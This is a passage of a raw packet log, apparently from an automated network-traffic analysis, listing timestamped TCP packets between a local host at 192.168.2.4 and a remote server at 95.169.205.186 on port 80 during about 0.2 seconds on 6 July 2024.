                                                              Jul 6, 2024 04:22:01.135967016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135981083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136008024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136260033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136270046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136279106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136290073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136301041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136306047 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136312962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136323929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136331081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136334896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136348009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136348963 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136362076 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136368990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136389017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136415958 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136697054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136708021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136717081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136745930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136773109 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136821985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136833906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136842966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136873007 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136898041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.136969090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136981010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.136997938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137006998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137012005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137017965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137022018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137038946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137047052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137065887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137088060 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137455940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137466908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137475967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137490988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137502909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137507915 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137514114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137525082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137533903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137536049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137547970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137554884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137559891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137571096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137574911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137583017 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137593031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137593985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137605906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137614965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137618065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137629986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.137634039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137655973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.137684107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.138068914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.138078928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.138113022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.138122082 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.138155937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.221972942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222023010 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222031116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222043037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222054005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222069025 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222069979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222090006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222105026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222116947 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222116947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222145081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222157955 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222192049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222203016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222232103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222280979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222292900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222321987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222405910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222417116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222429037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222439051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222444057 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222471952 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222497940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222881079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222893000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222903967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222917080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222927094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222930908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222939968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222953081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.222980976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.222980976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223001003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223162889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223175049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223185062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223196030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223201990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223215103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223216057 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223227978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223243952 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223269939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223536015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223547935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223557949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223568916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.223577976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223589897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.223615885 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224392891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224430084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224452972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224468946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224492073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224502087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224503040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224514961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224529982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224555016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224689007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224699974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224709988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224720955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224726915 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224731922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224744081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224755049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.224761963 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224790096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.224803925 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225034952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225045919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225076914 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225095987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225095987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225109100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225120068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225136042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225151062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225166082 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225256920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225269079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225281000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225295067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225308895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225328922 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225358009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225369930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225382090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225398064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225415945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225430012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225605965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225616932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225644112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225657940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225660086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225672960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225682020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225692034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225699902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225703955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225718021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225719929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225732088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225764990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.225951910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.225991011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226023912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226036072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226047039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226057053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226058006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226068974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226075888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226082087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226094961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226094961 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226113081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226131916 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226306915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226317883 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226337910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226344109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226346016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226346970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226347923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226351023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226363897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226392031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226417065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226598024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226609945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226620913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226633072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226639032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226644039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226645947 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226670027 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226694107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226782084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226793051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226803064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226814985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226821899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226825953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226839066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.226846933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.226876020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227058887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227071047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227082968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227097034 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227102041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227113962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227122068 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227124929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227144003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227145910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227149963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227149963 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227161884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227169037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227174997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227188110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227202892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227231026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227662086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227673054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227684975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227695942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227706909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227719069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227730036 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227741003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227746964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227752924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.227763891 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227780104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.227804899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228162050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228173018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228183985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228194952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228205919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228207111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228216887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228220940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228230953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228241920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228252888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228252888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228267908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228274107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228280067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.228305101 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.228328943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312175989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312197924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312207937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312244892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312269926 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312575102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312587023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312597990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312608957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312618017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312638998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312660933 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312674046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312699080 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312724113 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312736034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312748909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312781096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.312968016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312978983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.312990904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313003063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313014030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313015938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313035011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313047886 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313218117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313229084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313240051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313262939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313287020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313347101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313393116 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313474894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313486099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313496113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313508034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313519001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313522100 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313530922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313543081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313548088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313560009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313568115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313572884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313585043 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.313592911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.313616991 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317604065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317615032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317625046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317636013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317646027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317653894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317657948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317665100 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317670107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317678928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317686081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317698002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317708015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317711115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317718029 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317728996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317737103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.317739964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317750931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.317760944 CEST804973095.169.205.186192.168.2.4
